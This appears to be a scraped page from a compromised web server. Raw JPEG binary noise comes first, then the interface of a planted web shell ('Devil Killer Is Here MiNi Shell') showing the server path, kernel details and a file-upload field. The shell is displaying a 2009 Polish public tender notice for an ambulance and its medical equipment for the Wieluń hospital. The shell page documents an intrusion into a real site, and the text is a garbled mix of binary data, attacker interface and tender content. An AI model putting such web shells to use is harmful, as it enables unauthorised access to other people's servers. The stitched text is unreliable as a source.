JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090604/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090604/87121-N-2009.html

<p class="kh_header"><b>Wieluń: Zakup nowoczesnego ambulansu medycznego wraz z wyposażeniem dla potrzeb Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Wieluniu.</b><br>
<b>Numer ogłoszenia: 87121 - 2009; data zamieszczenia: 04.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu , ul. Szpitalna 16, 98-300 Wieluń, woj. łódzkie, tel. +48 043 8438311 w. 355, faks 043 843 83 11 wew. 213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.powiat.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup nowoczesnego ambulansu medycznego wraz z wyposażeniem dla potrzeb Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Wieluniu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Etap 1
Dostawa   pojazdu bazowego, przeznaczonego do adaptacji   na  ambulans     typu C

Marka, model, typ oferowanego pojazdu: 
Zamawiający dopuszcza zaoferowanie wyłącznie pojazdu fabrycznie nowego, nie eksploatowanego,  z  roku  produkcji  2008/2009   z  2 letnią   pełną  gwarancją- bez limitu kilometrów . 

Wymagane warunki techniczno-użytkowe	TAK/NIE	Parametr oferowany
1. NADWOZIE	-------------	-------------------------------------------
-	typ furgon częściowo przeszklony z DMC do 3,5 t.
-	kabina kierowcy wyposażona w dwa pojedyncze fotele 
-	minimalne wymiary przedziału ładunkowego umożliwiające wykonanie zabudowy dla pojazdu przeznaczonego na ambulans  typu C
-	drzwi boczne prawe przesuwne do tyłu z otwieraną szybą (drzwi do przedziału ładunkowego)
-	drzwi boczne lewe przesuwane do tyłu, bez
      szyby (drzwi do przedziału ładunkowego)
 -   drzwi tyłu nadwozia wysokie, przeszklone,  
      dwuskrzydłowe, obejmujące całą  ścianę 
      tylną, otwierające się pod kątem 260 o - 
      wyposażone dodatkowo w ograniczniki 
      oraz blokady położenia skrzydeł, 
-   stopień wejściowy tylny, stanowiący zderzak   
     ochronny 
-	stopień wejściowy do przedziału ładunkowego wewnętrzny stały lub zewnętrzny automatycznie chowany / wysuwany przy zamykaniu / otwieraniu drzwi przesuwnych
-	centralny zamek  we wszystkich drzwiach
-	autoalarm
-	reflektory przeciwmgielne  przednie
-	kolor biały
-    koło zapasowe zamontowane w sposób 
      nie powodujący zmniejszenia prześwitu 
      pomiędzy  podwoziem a podłożem
-     wizualny sygnał ostrzegający kierowcę 
      w czasie jazdy o fakcie niecałkowitego 
     domknięcia  drzwi		
2. SILNIK	
-     wysokoprężny z turbodoładowaniem , 
       pojemność skokowa 2100 ÷ 3000 cm3
-     moc silnika min. 160 KM, max. moment obrotowy nie mniejszy niż 330Nm
-    spełniający wymogi normy spalin EURO  4  lub EURO 5		
3. ZESPÓŁ  NAPĘDOWY
-     skrzynia biegów manualna synchronizowana  min. pięciobiegowa + bieg wsteczny,  z napędem na koła przednie lub tylne		
4.  ZAWIESZENIE	-------------	-------------------------------------------
-    zawieszenie ze stabilizatorami osi przedniej i tylnej lub zawieszenie hydropneumatyczne (pneumatyczne) ze stabilizacją,  gwarantujące  dobrą  przyczepność  kół  do nawierzchni, stabilność i manewrowość w trudnym terenie oraz  zapewniające odpowiedni komfort transportu  pacjenta (opisać  dokładnie)		
5.  UKŁAD HAMULCOWY	-------------	-------------------------------------------
-    ze wspomaganiem i korektorem siły hamowania,    
-    z systemem ABS  zapobiegającym  blokadzie  kół  w  trakcie  hamowania                                         
-    z systemem ESP  stabilizującym  tor jazdy
-   z systemem zapobiegającym poślizgowi kół w trakcie ruszania np. ASR
-	z systemem wspomagania nagłego hamowania np. BAS, BA
-	hamulce tarczowe na obu osiach (przód i tył)
		
6.  UKŁAD  KIEROWNICZY 	-------------	-------------------------------------------
-      ze wspomaganiem		
7.  INSTALACJA ELEKTRYCZNA	-------------	-------------------------------------------
-    alternator o mocy min. 1600 W
-    dwa akumulatory, każdy o pojemności min. 80 Ah		
8.  WYPOSAŻENIE POJAZDU	-------------	-------------------------------------------
- czołowe poduszki powietrzne dla kierowcy
i pasażera
-  elektrycznie sterowane szyby boczne w 
kabinie kierowcy
-  regulowana kolumna kierownicy w co 
najmniej dwóch płaszczyznach
- elektrycznie regulowane i podgrzewane 
lusterka zewnętrzne
-  klimatyzacja kabiny kierowcy
- komplet opon letnich wraz z felgami
- dwa trójkąty ostrzegawcze
		
9.  WYMAGANIA  DODATKOWE	-------------	-------------------------------------------
- rok produkcji ambulansu 2008/2009 (podać) , 
  fabrycznie nowy, nie eksploatowany,
- gwarancja na pojazd - minimum 24 miesiące 
- serwis w promieniu do 100 km od miasta   
 Wielunia
- świadectwo homologacji na pojazd  bazowy (załączyć do  oferty),
- przebiegi między przeglądami samochodu,  min. 20 000 km,
Etap 2

Wykonanie adaptacji pojazdu bazowego zaoferowanego w pierwszym  etapie  na ambulans spełniający wymagania normy PN-EN 1789:2008 (ambulans typu C) oraz pozostałe wymogi określone przez Zamawiającego, 
I.	NADWOZIE	--------------	-----------------------------------------------
 1.	- Wykonanie zewnętrznego schowka za lewymi drzwiami przesuwnymi (oddzielonego od przedziału medycznego i dostępnego z zewnątrz pojazdu), z miejscem mocowania min. 2 szt. butli tlenowych pojemności 10l, krzesełka kardiologicznego, noszy podbierakowych, materaca próżniowego , oraz deski ortopedycznej dla dorosłych - podać wymiary schowka w mm tj. wysokość, szerokość i głębokość. 
- Szyby okien w kabinie sanitarnej zmatowione w 2/3 wysokości.
-  Wymiary  wnętrza przystosowane  dla  potrzeb personelu  medycznego, do przewozu 5 osób (z kierowcą)  w pozycji siedzącej + 1 osoba w  pozycji leżącej na noszach, parametry przedziału medycznego :
    - wysokość min.185 cm, 
    - długość min. 320 cm
    - szerokość min. 170 cm
		
II.	OGRZEWANIE I WENTYLACJA	--------------	-----------------------------------------------
1.	Montaż nagrzewnicy w przedziale medycznym wykorzystującej ciecz chłodzącą silnik - podać markę i model. 		
2.	Montaż ogrzewania postojowego - grzejnik elektryczny z sieci 230 V z możliwością ustawienia temperatury i termostatem, min. moc grzewcza   2000 W.		
3.	Montaż niezależnego od pracy silnika systemu  ogrzewania przedziału kierowcy i przedziału medycznego, umożliwiającego ogrzanie silnika a także kabiny kierowcy i przedziału medycznego przed rozruchem silnika, z możliwością ustawienia temperatury i termostatem - podać markę i model.		
4.	Montaż mechanicznej dachowej wentylacji nawiewno - wywiewnej zapewniającej prawidłową wentylację przedziału medycznego. Podać markę i model wentylatora.		
5.	Rozbudowa klimatyzacji fabrycznej kabiny kierowcy na przedział medyczny (klimatyzacja dwuparownikowa). 
W przedziale medycznym klimatyzacja automatyczna tj. po ustawieniu żądanej temperatury systemy chłodzące lub grzewcze automatycznie utrzymują żądaną temperaturę w przedziale medycznym.		
6.	Montaż w przedziale medycznym wyświetlacza informującego o temperaturze w przedziale medycznym oraz temperaturze na zewnątrz pojazdu.		
7.	Montaż szyber dachu pełniącego jednocześnie funkcję wyjścia ewakuacyjnego o wymiarach min. 800 mm x 500 mm - podać markę i model.		
III.	INSTALACJA ELEKTRYCZNA	--------------	-----------------------------------------------
1.	Montaż w kabinie kierowcy wskaźnika naładowania akumulatora samochodu bazowego i przedziału medycznego (akumulatory są wyposażeniem standardowym pojazdu bazowego)		
2.	Wykonanie instalacji elektrycznej 230 V: 
- zasilanie zewnętrzne 230 V (gniazdo + wtyczka) 
- min. 2 gniazda w przedziale medycznym wewnętrznymi 
- zabezpieczenie uniemożliwiające rozruch silnika przy podłączonym zasilaniu zewnętrznym 
- zabezpieczenie przeciwporażeniowe.
- pokrywający zapotrzebowanie na energię               elektryczną wszystkich urządzeń ambulansu
		
3.	Montaż automatycznej ładowarki akumulatorowej umożliwiającej jednoczesne ładowanie dwóch akumulatorów na postoju (podać markę i model ładowarki). 		
4.	Wykonanie instalacji elektrycznej 12V:
- min. 4 gniazda 12 V w przedziale medycznym (w tym jedno 20A), do podłączenia urządzeń medycznych. 
- gniazda zabezpieczone przed zalaniem lub zabrudzeniem, wyposażone we wtyki 		
IV.	SYGNALIZACJA ŚWIETLNO - DŹWIĘKOWA I OZNAKOWANIE	--------------	-----------------------------------------------
1.	Montaż w przedniej części dachu pojazdu belki świetlnej niebieskiej z min. 2 lampami pulsacyjnymi typu stroboskopowego lub LED, w belce lub w komorze silnika zamontowany głośnik  z sygnałem dźwiękowym modulowanym, mocy min. 100W z możliwością podawania komunikatów głosem-  (podać markę, model).
Wysokość pojazdu po za budowie nie może przekraczać 255 cm!!		
2.	Montaż na wysokości pasa przedniego 2 niebieskich lamp pulsacyjnych barwy niebieskiej typu stroboskopowego lub LED 		
3.	Montaż w tylnej części dachu pojazdu min. 1 lampy koloru niebieskiego, typu stroboskopowego lub LED    (podać markę, model)		
4.	Montaż na drzwiach tylnych lampy świateł pozycyjnych działających przy otwarciu ww. drzwi		
5.	Montaż dodatkowych żółtych świateł awaryjnych nad tylnymi drzwiami , oraz dodatkowych migaczy zamontowanych  w górnych, tylnych częściach nadwozia		
6.	Wykonanie oznakowania pojazdu:
- pas odblaskowy barwy niebieskiej dookoła pojazdu na wysokości linii podziału nadwozia, 
- dodatkowy pas czerwony pod niebieskim oraz wokół dachu.
- napis lustrzany AMBULANS z przodu pojazdu, kolor czerwony odblaskowy
- standardowe oznaczenie typu karetki literą S wpisaną w okrąg na bokach  i drzwiach tylnych pojazdu.
- oznakowanie symbolem Państwowego Ratownictwa Medycznego określonego w załączniku do ustawy z dnia 25 lipca 2001 r. o 
PRM		
7.	Montaż reflektorów zewnętrznych, po bokach oraz z tyłu pojazdu, po 2 z każdej strony, ze światłem rozproszonym do oświetlenia miejsca akcji, włączanie i wyłączanie reflektorów zarówno z kabiny kierowcy jak i z przedziału medycznego.
		
8.	Montaż dodatkowych sygnałów pneumatycznych przeznaczonych do pracy ciągłej - podać markę i model.		
V.	ŁĄCZNOŚĆ RADIOWA	--------------	-----------------------------------------------
1.	Montaż na dachu pojazdu anteny marki Radmor typ 30834/3 lub równoważna
a) 1/4 fali 
b) zakres częstotliwości 168-170 MHz
c) impedancje wejścia 50 Ohm
d) współczynnik fali stojącej mniejszy jak  1,4
e) polaryzacje pionowa
f) charakterystykę promieniowania dookolną
g) odporność na działanie wiatru  55m/blokadzie
h) pod anteną zamontowana zaślepka, po 
odkręceniu której będzie istniał dostęp do główki anteny,
i) wyprowadzenie kabla antenowego i  zasilania 12 V do radiostacji w kabinie ambulansu		
2.	Montaż w przedziale medycznym głośnika z możliwością podłączenia do radiotelefonu.		
3. 	Radiotelefon (Motorola GM 360  lub równoważny) posiadający:
a) deklaracje zgodności CE - załączyć
b) zakres częstotliwości: 136-174 MHz
c) liczbę kanałów min. 250 z możliwością 
 skanowania oraz jednoczesną pracą 
 zsimpleksową  oraz dwusimpleksową,
d) rodzaj modulacji F3E,
e) odstęp między kanałowy 12,5 kHz,
f) odporność na intermodulację 75 dB,
g) selektywność sąsiedniokanałowa 65 dB,
h) zasilanie 12 do 14,5 V (z uziemionym 
    minusem),
i) regulowaną moc nadajnika z ogranicznikiem czasu nadawania wynoszącą od 0,5 do 25 W dla nadajników przenośnych, od 0,5 do 5 W dla nadajników przewoźnych i bazowych,
j) czułość odbiornika 0,3 ? V,
k) zakres pracy w temperaturach od -30 stopni C do + 60 stopni C,
l) promieniowanie niepożądane nieharmoniczne - 36 dBm,
ł)  możliwość współpracy z siecią telefoniczną  (PSIN) w systemie DTMF,
m)możliwość pracy w systemie przywoławczym
VI.	OŚWIETLENIE PRZEDZIAŁU MEDYCZNEGO	--------------	-----------------------------------------------
1.	Montaż co najmniej 6 lamp sufitowych z oświetleniem rozproszonym w kolorze naturalnym.		
2.	Montaż co najmniej 2 sufitowych halogenowych punktów świetlnych nad noszami,  z regulacją kąta padania światła. 		
3.	Wykonanie oświetlenia punktowego blatu roboczego.		
VII.	WYPOSAŻENIE PRZEDZIAŁU MEDYCZNEGO	--------------	-----------------------------------------------
1.	Wykonanie antypoślizgowej podłogi, wzmocnionej, połączonej szczelnie z zabudową ścian.		
2.	Wzmocnienie ścian bocznych (nie miejscowe lecz pełne - izolacja dźwiękowo-termiczna przedziału medycznego) umożliwiające montaż sprzętu medycznego.		
3.	Pokrycie ścian bocznych i sufitu specjalnym tworzywem sztucznym - łatwo zmywalnym i odpornym na środki dezynfekujące, w kolorze białym.		
4.	Montaż na prawej ścianie dwóch foteli obrotowych wyposażonych w bezwładnościowe, trzypunktowe pasy bezpieczeństwa i zagłówki (regulowane lub zintegrowane), ze składanymi do pionu siedziskami i regulowanym oparciem pod plecami (regulowany kąt oparcia). Podać markę i model oferowanych foteli.		
5.	Montaż przy ścianie działowej u wezgłowia noszy fotela usytuowanego tyłem do kierunku jazdy, ze składanym do pionu siedziskiem, zagłówkiem (regulowanym lub zintegrowanym) i bezwładnościowym pasem bezpieczeństwa. Podać markę i model oferowanego fotela.		
6.	Wykonanie przegrody między kabiną kierowcy a przedziałem medycznym. Przegroda zapewniająca możliwość oddzielenia obu przedziałów oraz komunikację pomiędzy personelem medycznym a kierowcą, przegroda ma być wyposażona w drzwi spełniające normę PN EN 1789		
7.	Wykonanie zabudowy meblowej na ścianach bocznych (lewej i prawej):
- zestawy szafek i półek wykonanych z tworzywa sztucznego, zabezpieczone przed niekontrolowanym wypadnięciem  umieszczonych tam przedmiotów, z miejscem mocowania wyposażenia medycznego tj. deska pediatryczna, kamizelka typu KED, szyny Kramera, torba opatrunkowa,
- półki podsufitowe z przezroczystymi szybkami i podświetleniem umożliwiającym podgląd na umieszczone tam przedmioty. 
Do oferty należy dołączyć schemat oferowanej zabudowy medycznej przedstawiający widok strony lewej i prawej przedziału medycznego .		
8.	Wykonanie zabudowy meblowej na ścianie działowej:
- zespół szafek z miejscem do zamocowania 2 szt. walizek lub toreb medycznych (możliwość wyjmowania do wnętrza przedziału medycznego z jednoczesnym dostępem z zewnątrz poprzez drzwi boczne)  
- blat roboczy wykończony blachą nierdzewną z pojemnikami na zużyte igły, strzykawki - min. 2 szt.
- uchwyt mocujący min. 2 szt. pudełek na rękawiczki jednorazowe 
Do oferty należy dołączyć schemat oferowanej zabudowy medycznej przedstawiający widok zabudowy ściany działowej pomiędzy kabiną kierowcy a przedziałem medycznym.		
9.	Montaż sufitowego uchwytu do kroplówek na min. 3 szt. pojemników.		
10.	Montaż sufitowego uchwytu dla personelu medycznego.		
11.	Montaż szyny typu Modura dł. min 30 cm na ścianie lewej.		
12.	Wykonanie centralnej instalacji tlenowej:
- minimum 2 gniazda poboru tlenu - typ AGA, na ścianie lewej monoblokowe typu panelowego 
- 2 szt. butli tlenowych pojemności 10 litrowych z reduktorami (konstrukcja reduktora umożliwiająca montaż i demontaż reduktora bez konieczności używania kluczy).
- konstrukcja instalacji tlenowej ma zapewnić możliwość swobodnego dostępu do zaworów butli tlenowych oraz obserwacji manometrów reduktorów tlenowych bez potrzeby zdejmowania osłony
- konstrukcja instalacji tlenowej ma umożliwiać zasilanie paneli tlenowych równocześnie z obu butli tlenowych bez potrzeby zdejmowania osłony.		
13.	Montaż podstawy (lawety) pod nosze główne posiadającej przesuw boczny, możliwość pochyłu o min. 100 do pozycji Trendelenburga i Antytrendelenburga, (pozycji drenażowej), z wysuwem na zewnątrz pojazdu umożliwiającym wjazd noszy na lawetę, (podać markę i model, załączyć folder i deklarację zgodności).		
14.	Montaż w przedziale medycznym zegara elektronicznego z kalendarzem (data, dzień, godzina)		
15.	Montaż termoboxu stacjonarnego do ogrzewania płynów infuzyjnych (w przedziale medycznym ma znajdować się wyświetlacz informujący o temperaturze wewnątrz termoboxu).		
16.	W przedziale medycznym mają być zapewnione uchwyty do  mocowania sprzętu medycznego tj. defibrylator, respirator, ssak elektryczny, pompa infuzyjna.		
VIII.	WYPOSAŻENIE POJAZDU / WYMAGANIA DODATKOWE	--------------	-----------------------------------------------
1.	Przedział medyczny ma być wyposażony w: 
- urządzenie do wybijania szyb
- nóż do przecinania pasów bezpieczeństwa
- gaśnice
- co najmniej dwa kosze na śmieci (w przedniej i tylnej części przedziału medycznego)		
2.	Kabina kierowcy ma być wyposażona w:
- sygnalizację akustyczną i/lub optyczną ostrzegającą kierowcę o rozładowaniu akumulatora samochodu bazowego i akumulatora dodatkowego
- sygnalizację optyczną informującą kierowcę o włączeniu reflektorów zewnętrznych
- sygnalizację optyczną informującą kierowcę o podłączeniu ambulansu do sieci 230 V
- sygnalizację optyczną informującą kierowcę o braku możliwości uruchomienia pojazdu z powodu otwartych drzwi między przedziałem medycznym a kabiną kierowcy.		
3.	Zamontowanie w kabinie kierowcy radioodtwarzacza CD / MP3 		
IX.	POJAZD MA BYĆ WYPOSAŻONY W NASTĘPUJĄCY SPRZĘT MEDYCZNY (spełniający wymogi normy PN EN 1865:2002)	--------------	-----------------------------------------------
1.	NOSZE GŁÓWNE  
podać markę i model, załączyć folder 		
	przystosowane do prowadzenia reanimacji wyposażone w twardą płytę na całej długości pod materacem umożliwiającą ustawienie wszystkich dostępnych funkcji;		
	nosze potrójnie łamane z możliwością ustawienia pozycji przeciwwstrząsowej i pozycji zmniejszającej napięcie mięśni brzucha;		
	z możliwością płynnej regulacji kąta nachylenia oparcia pod plecami do min 75 stopni;		
	z zestawem pasów szelkowych i poprzecznych zabezpieczających pacjenta o regulowanej długości mocowanych bezpośrednio do ramy noszy 		
	z dodatkowym zestawem pasów lub uprzęży służącej do transportu małych dzieci na noszach w pozycji siedzącej lub leżącej - podać markę i model załączyć folder wraz z opisem		
	nosze muszą posiadać trwale oznakowane najlepiej graficznie elementy związane z ich obsługą;   
		
	ze składanymi poręczami bocznymi, z rączkami do przenoszenia		
	z możliwością wprowadzania noszy na transporter przodem lub tyłem do kierunku jazdy;		
	nosze muszą być zabezpieczone przed korozją poprzez wykonanie ich z odpowiedniego materiału lub poprzez zabezpieczenie ich środkami antykorozyjnymi; 		
	z cienkim nie sprężynującym materacem z tworzywa sztucznego nie przyjmującym krwi, brudu , przystosowanym do dezynfekcji , umożliwiającym ustawienie wszystkich dostępnych pozycji transportowych;		
	wyposażone w prześcieradło jednorazowe do noszy z wycięciami na pasy 		
	obciążenie dopuszczalne noszy powyżej 200 kg (podać obciążenie dopuszczalne w kg)		
	waga oferowanych noszy max. 23 kg zgodnie z wymogami normy PN EN 1865 (podać wagę noszy w kg);		
2	 TRANSPORTER NOSZY GŁÓWNYCH 
podać markę i model, załączyć folder		
	z systemem szybkiego i bezpiecznego połączenia z noszami; 		
	regulację wysokości w min sześciu poziomach;		
	możliwość ustawienia pozycji drenażowych (Trendelenburga i Fowlera na min 3 poziomach pochylenia);		
	wszystkie kółka jezdne o średnicy min. 100mm, kółka umożliwiające jazdę zarówno w pomieszczeniach zamkniętych jak i poza nimi na utwardzonych nawierzchniach (podać średnicę kółek w mm); 		
	możliwość prowadzenia noszy bokiem do kierunku jazdy przez 1 osobę z dowolnej strony transportera		
	min. dwa kółka wyposażone w hamulce		
	system mocowania transportera na podstawie musi być zgodny z wymogami PN EN 1789;		
	obciążenie dopuszczalne transportera powyżej 200 kg (podać dopuszczalne obciążenie w kg);		
	waga transportera max. 28 kg (podać wagę transportera w kg);		
	transporter musi posiadać trwale oznakowane najlepiej graficznie elementy związane z ich obsługą		
	transporter musi być zabezpieczony przed korozją poprzez wykonanie z odpowiedniego materiału lub poprzez zabezpieczenie środkami antykorozyjnymi;		
	deklaracje zgodności na oferowany system transportowy (noszę i transporter) - załączyć do oferty;
3.	 KRZESŁO TRANSPORTOWE SKŁADANE  podać markę i model, załączyć folder i deklarację zgodności )		
	wykonane z  materiału odpornego na korozje i na działanie płynów dezynfekujących		
	wyposażone w min 4 kółka transportowe z czego min. 2 obrotowe i min. 2 wyposażone w hamulce 		
	wyposażone w przednie rączki transportowe z regulacją długości		
	wyposażone w składane tylne rączki transportowe		
	wyposażone w blokadę zabezpieczającą przed złożeniem w trakcie transportu		
	siedzisko i oparcie wykonane z mocnego  materiału, odpornego na bakterie, grzyby, zmywalnego, dezynfekowanego , szybkodemontowalne		
	wyposażone w min 3 pasy zabezpieczające umożliwiające szybkie ich rozpięcie		
	waga max 10 kg		
	dopuszczalne obciążenie powyżej 150 kg		
4.	NOSZE PODBIERAKOWE 
(podać markę i model, załączyć folder i deklaracje zgodności ) 		
	wyposażone w komplet min 3 szt. pasów zabezpieczających		
	łopaty muszą być wykonane z tworzywa sztucznego		
	muszą być prześwietlane dla promieni RTG w stopniu diagnostycznym		
	muszą posiadać zamki z podwójną zapadką o konstrukcji zabezpieczającej przed niekontrolowanym rozpięciem  lub wyposażone w dodatkowy system zabezpieczeń przed rozpięciem łopat noszy (opisać)		
	muszą umożliwiać złożenie ich w połowie długości		
	muszą umożliwiać regulację długości pozwalającą na dobór do pacjentów o różnym wzroście		
	muszą posiadać min 10 uchwytów do przenoszenia umieszczonych na obwodzie noszy		
	obciążenie dopuszczalne powyżej 150 kg		
	waga noszy max 8 kg
		
5.	DESKA ORTOPEDYCZNA Z UNIERUCHOMIENIEM  GŁOWY  I KOMPLETEM  PASÓW 
(podać markę i model, załączyć folder i deklarację zgodności CE) 		
	deska ortopedyczna wykonana z tworzywa sztucznego		
	przenikliwa dla promieni X w stopniu umożliwiającym diagnostykę RTG		
	ze ściętym końcem od strony nóg ułatwiającym pracę w ciasnych przestrzeniach		
	wyposażona w min 16 uchwytów do przenoszenia rozmieszczonych na obwodzie deski		
	wyposażona w min 5 punktów na dłuższej stronie deski do mocowania pasów		
	wyposażona w min 4 pasy zabezpieczające o regulowanej długości dwuczęściowe z obrotowymi metalowymi karabińczykami oraz metalowymi spięciami typu klamra		
	wyposażona w unieruchomienie głowy wielokrotnego użytku składające się z podkładki oraz 2 klocków stabilizujących z otworami usznymi oraz 2 paskami spinającymi		
	waga deski max. 8 kg		
	obciążenie dopuszczalne powyżej 150 kg		
	szerokość deski w zakresie od 45 do 50 cm		
6.	ZESTAW SZYN KRAMERA 
(podać markę i model, załączyć folder)		
	zestaw szyn Kramera w powleczeniach wykonanych z tworzywa sztucznego w kolorze niebieskim, 1 kpl- 14 szt. w różnych rozmiarach + torba na zestaw szyn Kramera. 		
	Szyna wyciągowa		
7.	DEFIBRYLATOR PRZENOŚNY 
(podać markę i model , załączyć folder)		
	defibrylacja dwufazowa z zakresem regulacji energii od 2 do min. 200 J Podać dostępne poziomy energii oraz zalecany algorytm defibrylacji dla dorosłych i dla dzieci;		
	przenośny, transportowy, odporny na drgania i wstrząsy; waga kompletnego  defibrylatora poniżej 10kg		
	posiadający opakowanie transportowe zabezpieczające aparat przed uszkodzeniem, posiadający uchwyt pozwalającym na montaż i transport aparatu w karetce (uchwyt zgodny z normą PN EN 1789 , podać markę i model , załączyć potwierdzenie przeprowadzenia badań na zgodność z normą PN EN 1789 );		
	czas ładowania defibrylatora do energii maksymalnej  poniżej  10 sek.;		
	regulacja parametrów defibrylacji : wybór energii,  ładowanie, wyzwolenie wstrząsu - z łyżek zewnętrznych i płyty czołowej aparatu;		
	ilość poziomów energetycznych dostępnych przy defibrylacji zewnętrznej: min 19;		
	defibrylacja dorosłych i dzieci -  łyżki dla dorosłych i dzieci w komplecie;		
